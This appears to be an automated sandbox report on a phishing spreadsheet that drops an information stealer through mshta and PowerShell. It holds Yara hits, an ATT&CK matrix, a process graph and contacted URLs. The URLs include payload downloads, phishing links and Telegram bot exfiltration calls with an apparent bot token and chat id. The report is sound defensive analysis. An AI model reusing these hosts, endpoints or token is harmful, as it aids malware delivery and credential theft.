                        Source: Yara matchFile source: 0000001D.00000002.626231318.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.625935756.0000000002691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 12.2.sihost.exe.43da760.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.441db80.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.441db80.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.43da760.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3408, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3620, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: bKVNuVuE.exe PID: 3560, type: MEMORYSTR
                        Source: Yara matchFile source: 12.2.sihost.exe.43da760.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.441db80.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.441db80.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.43da760.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3408, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3620, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information1
                        Scripting
                        Valid Accounts13
                        Exploitation for Client Execution
                        1
                        Scripting
                        1
                        DLL Side-Loading
                        11
                        Disable or Modify Tools
                        1
                        OS Credential Dumping
                        1
                        File and Directory Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Web Service
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts111
                        Command and Scripting Interpreter
                        1
                        DLL Side-Loading
                        111
                        Process Injection
                        1
                        Deobfuscate/Decode Files or Information
                        LSASS Memory14
                        System Information Discovery
                        Remote Desktop Protocol1
                        Data from Local System
                        15
                        Ingress Tool Transfer
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Scheduled Task/Job
                        1
                        Browser Extensions
                        1
                        Scheduled Task/Job
                        32
                        Obfuscated Files or Information
                        Security Account Manager11
                        Security Software Discovery
                        SMB/Windows Admin Shares11
                        Email Collection
                        11
                        Encrypted Channel
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts3
                        PowerShell
                        1
                        Scheduled Task/Job
                        Login Hook1
                        Install Root Certificate
                        NTDS1
                        Process Discovery
                        Distributed Component Object Model1
                        Clipboard Data
                        1
                        Non-Standard Port
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                        Software Packing
                        LSA Secrets41
                        Virtualization/Sandbox Evasion
                        SSHKeylogging4
                        Non-Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        DLL Side-Loading
                        Cached Domain Credentials1
                        Application Window Discovery
                        VNCGUI Input Capture35
                        Application Layer Protocol
                        Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Masquerading
                        DCSync1
                        Remote System Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                        Virtualization/Sandbox Evasion
                        Proc Filesystem1
                        System Network Configuration Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                        Process Injection
                        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1492413 Sample: SecuriteInfo.com.PDF.Phishi... Startdate: 13/08/2024 Architecture: WINDOWS Score: 100 93 Suricata IDS alerts for network traffic 2->93 95 Found malware configuration 2->95 97 Malicious sample detected (through community Yara rule) 2->97 99 26 other signatures 2->99 10 EXCEL.EXE 31 30 2->10         started        15 taskeng.exe 2->15         started        process3 dnsIp4 83 192.3.176.138, 49162, 49164, 49165 AS-COLOCROSSINGUS United States 10->83 85 exi.link 159.203.133.15, 443, 49161, 49163 DIGITALOCEAN-ASNUS United States 10->85 65 ~$SecuriteInfo.com....tr.8047.20915.xlsx, data 10->65 dropped 67 C:\Users\user\AppData\Local\...\40[1].hta, HTML 10->67 dropped 133 Microsoft Office drops suspicious files 10->133 17 mshta.exe 10 10->17         started        21 AcroRd32.exe 27 10->21         started        23 bKVNuVuE.exe 15->23         started        file5 signatures6 process7 dnsIp8 75 exi.link 17->75 101 Suspicious command line found 17->101 103 PowerShell case anomaly found 17->103 25 cmd.exe 17->25         started        28 RdrCEF.exe 21->28         started        105 Antivirus detection for dropped file 23->105 107 Multi AV Scanner detection for dropped file 23->107 109 Machine Learning detection for dropped file 23->109 111 2 other signatures 23->111 30 bKVNuVuE.exe 23->30         started        33 powershell.exe 23->33         started        35 schtasks.exe 23->35         started        37 4 other processes 23->37 signatures9 process10 dnsIp11 121 Suspicious powershell command line found 25->121 123 PowerShell case anomaly found 25->123 39 powershell.exe 24 25->39         started        87 reallyfreegeoip.org 30->87 89 api.telegram.org 30->89 91 4 other IPs or domains 30->91 125 Tries to steal Mail credentials (via file / registry access) 30->125 127 Tries to harvest and steal browser information (history, passwords, etc) 30->127 signatures12 129 Tries to detect the country of the analysis system (by using the IP) 87->129 131 Uses the Telegram API (likely for C&C communication) 89->131 process13 file14 59 C:\Users\user\AppData\Roaming\sihost.exe, PE32 39->59 dropped 61 C:\Users\user\AppData\Local\...\sihost[1].exe, PE32 39->61 dropped 63 C:\Users\user\AppData\...\d1xzy0xm.cmdline, Unicode 39->63 dropped 117 Installs new ROOT certificates 39->117 119 Powershell drops PE file 39->119 43 sihost.exe 5 39->43         started        47 csc.exe 2 39->47         started        signatures15 process16 file17 69 C:\Users\user\AppData\Roaming\bKVNuVuE.exe, PE32 43->69 dropped 71 C:\Users\user\AppData\Local\...\tmp8AF2.tmp, XML 43->71 dropped 135 Antivirus detection for dropped file 43->135 137 Multi AV Scanner detection for dropped file 43->137 139 Machine Learning detection for dropped file 43->139 141 3 other signatures 43->141 49 sihost.exe 43->49         started        53 powershell.exe 4 43->53         started        55 schtasks.exe 43->55         started        73 C:\Users\user\AppData\Local\...\d1xzy0xm.dll, PE32 47->73 dropped 57 cvtres.exe 47->57         started        signatures18 process19 dnsIp20 77 api.telegram.org 49->77 79 api.telegram.org 149.154.167.220, 443, 49199, 49202 TELEGRAMRU United Kingdom 49->79 81 11 other IPs or domains 49->81 113 Tries to steal Mail credentials (via file / registry access) 49->113 signatures21 115 Uses the Telegram API (likely for C&C communication) 77->115

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx8%ReversingLabs
                        SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\bKVNuVuE.exe100%AviraTR/Dropper.MSIL.Gen
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sihost[1].exe100%AviraTR/Dropper.MSIL.Gen
                        C:\Users\user\AppData\Roaming\sihost.exe100%AviraTR/Dropper.MSIL.Gen
                        C:\Users\user\AppData\Roaming\bKVNuVuE.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sihost[1].exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\sihost.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sihost[1].exe42%ReversingLabsByteCode-MSIL.Trojan.Generic
                        C:\Users\user\AppData\Roaming\bKVNuVuE.exe42%ReversingLabsByteCode-MSIL.Trojan.Generic
                        C:\Users\user\AppData\Roaming\sihost.exe42%ReversingLabsByteCode-MSIL.Trojan.Generic
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://ocsp.entrust.net030%URL Reputationsafe
                        https://contoso.com/License0%URL Reputationsafe
                        http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                        http://go.micros0%URL Reputationsafe
                        http://varders.kozow.com:80810%URL Reputationsafe
                        http://checkip.dyndns.org/0%URL Reputationsafe
                        http://checkip.dyndns.org/q0%URL Reputationsafe
                        https://contoso.com/0%URL Reputationsafe
                        https://nuget.org/nuget.exe0%URL Reputationsafe
                        http://reallyfreegeoip.org0%URL Reputationsafe
                        http://checkip.dyndns.com0%URL Reputationsafe
                        http://ocsp.entrust.net0D0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                        http://nuget.org/NuGet.exe0%URL Reputationsafe
                        http://crl.entrust.net/server1.crl00%URL Reputationsafe
                        https://contoso.com/Icon0%URL Reputationsafe
                        http://checkip.dyndns.org0%URL Reputationsafe
                        https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                        http://aborters.duckdns.org:8081100%URL Reputationmalware
                        https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                        http://51.38.247.67:8081/_send_.php?L0%URL Reputationsafe
                        http://anotherarmy.dns.army:8081100%URL Reputationmalware
                        http://us2.smtp.mailhostbox.com0%Avira URL Cloudsafe
                        https://reallyfreegeoip.org0%URL Reputationsafe
                        https://secure.comodo.com/CPS00%URL Reputationsafe
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%208/14/2024%20/%207:15:53%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                        http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                        https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                        http://192.3.176.138/40/sihost.e0%Avira URL Cloudsafe
                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe
                        http://192.3.176.138/xampp/sop/40.htax0%Avira URL Cloudsafe
                        https://www.ecosia.org/search?q=0%Avira URL Cloudsafe
                        https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf0%Avira URL Cloudsafe
                        https://api.telegram.org/bot0%Avira URL Cloudsafe
                        https://api.telegram.org0%Avira URL Cloudsafe
                        https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                        http://192.3.176.138/xampp/sop/40.hta...se0%Avira URL Cloudsafe
                        http://192.3.176.138/xampp/sop/40.htahttp://192.3.176.138/xampp/sop/40.htaP0%Avira URL Cloudsafe
                        http://192.3.176.138/xampp/sop/40.htat0%Avira URL Cloudsafe
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                        http://192.3.176.138/_0%Avira URL Cloudsafe
                        https://dotnet.microsoft.c0%Avira URL Cloudsafe
                        https://exi.link/JkAPbLp100%Avira URL Cloudphishing
                        https://reallyfreegeoip.org/xml/8.46.123.3340%Avira URL Cloudsafe
                        https://www.online-banking.business.hsbc.com.hk/portalserver/hsbc/dbbpage/commercial/online/timetabl0%Avira URL Cloudsafe
                        https://api.telegram.org/bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=40390%Avira URL Cloudsafe
                        https://www.google.com/search?q=wmf0%Avira URL Cloudsafe
                        https://api.telegram.org/bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery0%Avira URL Cloudsafe
                        https://exi.link/JkAPbLAA100%Avira URL Cloudphishing
                        http://192.3.176.138/xampp/sop/40.hta...0%Avira URL Cloudsafe
                        http://192.3.176.138/xampp/sop/40.htaC:0%Avira URL Cloudsafe
                        https://exi.link/a100%Avira URL Cloudphishing
                        http://192.3.176.138/xampp/sop/40.hta060%Avira URL Cloudsafe
                        https://exi.link/JkAPbLEA100%Avira URL Cloudphishing
                        https://exi.link/S-100%Avira URL Cloudphishing
                        http://192.3.176.138/40/sihost.exe0%Avira URL Cloudsafe
                        https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i0%Avira URL Cloudsafe
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20a0%Avira URL Cloudsafe
                        https://cdn.ecosia.org/assets/image0%Avira URL Cloudsafe
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                        http://192.3.176.138/xampp/sop/40.htalent%0%Avira URL Cloudsafe
                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search0%Avira URL Cloudsafe
                        https://exi.link/JkAPbLyX100%Avira URL Cloudphishing
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=0%Avira URL Cloudsafe
                        https://www.google.com/favicon.ico0%Avira URL Cloudsafe
                        http://192.3.176.138/40/sihost.exep0%Avira URL Cloudsafe
                        https://exi.link/JkAPbL100%Avira URL Cloudphishing
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                        https://www.google.com/sorry/index0%Avira URL Cloudsafe
                        https://www.business.hsbc.com.hk/en-gb/resource-centre/commercial-tariffs)0%Avira URL Cloudsafe
                        http://192.3.176.138/xampp/sop/40.htaJ60%Avira URL Cloudsafe
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%208/15/2024%20/%207:26:06%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D0%Avira URL Cloudsafe
                        https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a0%Avira URL Cloudsafe
                        http://192.3.176.138/0%Avira URL Cloudsafe
                        https://exi.link/100%Avira URL Cloudphishing
                        https://www.google.com/search?q=net0%Avira URL Cloudsafe
                        https://www.google.com/sorry/indextest0%Avira URL Cloudsafe
                        http://api.telegram.org0%Avira URL Cloudsafe
                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
                        http://192.3.176.138/xampp/sop/40.hta0%Avira URL Cloudsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        us2.smtp.mailhostbox.com
                        208.91.199.225
                        truetrue
                          unknown
                          exi.link
                          159.203.133.15
                          truefalse
                            unknown
                            reallyfreegeoip.org
                            188.114.96.3
                            truetrue
                              unknown
                              api.telegram.org
                              149.154.167.220
                              truetrue
                                unknown
                                checkip.dyndns.com
                                158.101.44.242
                                truefalse
                                  unknown
                                  checkip.dyndns.org
                                  unknown
                                  unknowntrue
                                    unknown
                                    NameMaliciousAntivirus DetectionReputation
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%208/14/2024%20/%207:15:53%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://checkip.dyndns.org/false
                                    • URL Reputation: safe
                                    unknown
                                    https://api.telegram.org/bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://192.3.176.138/40/sihost.exetrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://reallyfreegeoip.org/xml/8.46.123.33false
                                    • URL Reputation: safe
                                    unknown
                                    https://exi.link/JkAPbLfalse
                                    • Avira URL Cloud: phishing
                                    unknown
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%208/15/2024%20/%207:26:06%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://192.3.176.138/xampp/sop/40.htatrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabsihost.exe, 00000011.00000002.625935756.0000000002955000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.000000000370C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002914000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002927000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.0000000003758000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B15000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://192.3.176.138/40/sihost.epowershell.exe, 00000007.00000002.438678228.0000000002876000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://duckduckgo.com/ac/?q=sihost.exe, 00000011.00000002.625935756.0000000002955000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.000000000370C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002914000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002927000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.629360646.0000000003758000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B15000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3DwmfbKVNuVuE.exe, 0000001D.00000002.629343652.0000000003A4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://api.telegram.orgbKVNuVuE.exe, 0000001D.00000002.626231318.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://api.telegram.org/botbKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://us2.smtp.mailhostbox.comsihost.exe, 00000011.00000002.625935756.0000000002AAA000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002A9E000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002968000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002B69000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://ocsp.entrust.net03mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C401000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://www.ecosia.org/search?q=sihost.exe, 00000011.00000002.629360646.000000000370C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://192.3.176.138/xampp/sop/40.htaxmshta.exe, 00000004.00000003.416161559.00000000023FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://192.3.176.138/xampp/sop/40.hta...semshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://dotnet.microsoft.csihost.exe, 00000011.00000002.629360646.0000000003856000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://192.3.176.138/xampp/sop/40.htahttp://192.3.176.138/xampp/sop/40.htaPmshta.exe, 00000004.00000003.416161559.00000000023F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://192.3.176.138/xampp/sop/40.htatmshta.exe, 00000004.00000003.416265424.00000000001A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414459456.00000000001A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.416776034.00000000001A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://contoso.com/Licensepowershell.exe, 00000007.00000002.446514790.0000000012381000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000002.417101402.00000000038E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452900071.000000001C412000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624885368.000000000057C000.00000004.00000020.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.625146284.0000000000964000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://192.3.176.138/_mshta.exe, 00000004.00000002.417101402.0000000003932000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415346965.0000000003932000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://reallyfreegeoip.org/xml/8.46.123.334sihost.exe, 00000011.00000002.625935756.00000000027D4000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000282C000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027C6000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002776000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.000000000281E000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029CE000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002977000.00000004.00000800.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.00000000029D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://go.microspowershell.exe, 00000007.00000002.438678228.0000000002876000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://varders.kozow.com:8081sihost.exe, 0000000C.00000002.460456249.00000000043DA000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.625935756.0000000002691000.00000004.00000800.00020000.00000000.sdmp, sihost.exe, 00000011.00000002.624471340.0000000000430000.00000040.00000400.00020000.00000000.sdmp, bKVNuVuE.exe, 0000001D.00000002.626231318.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
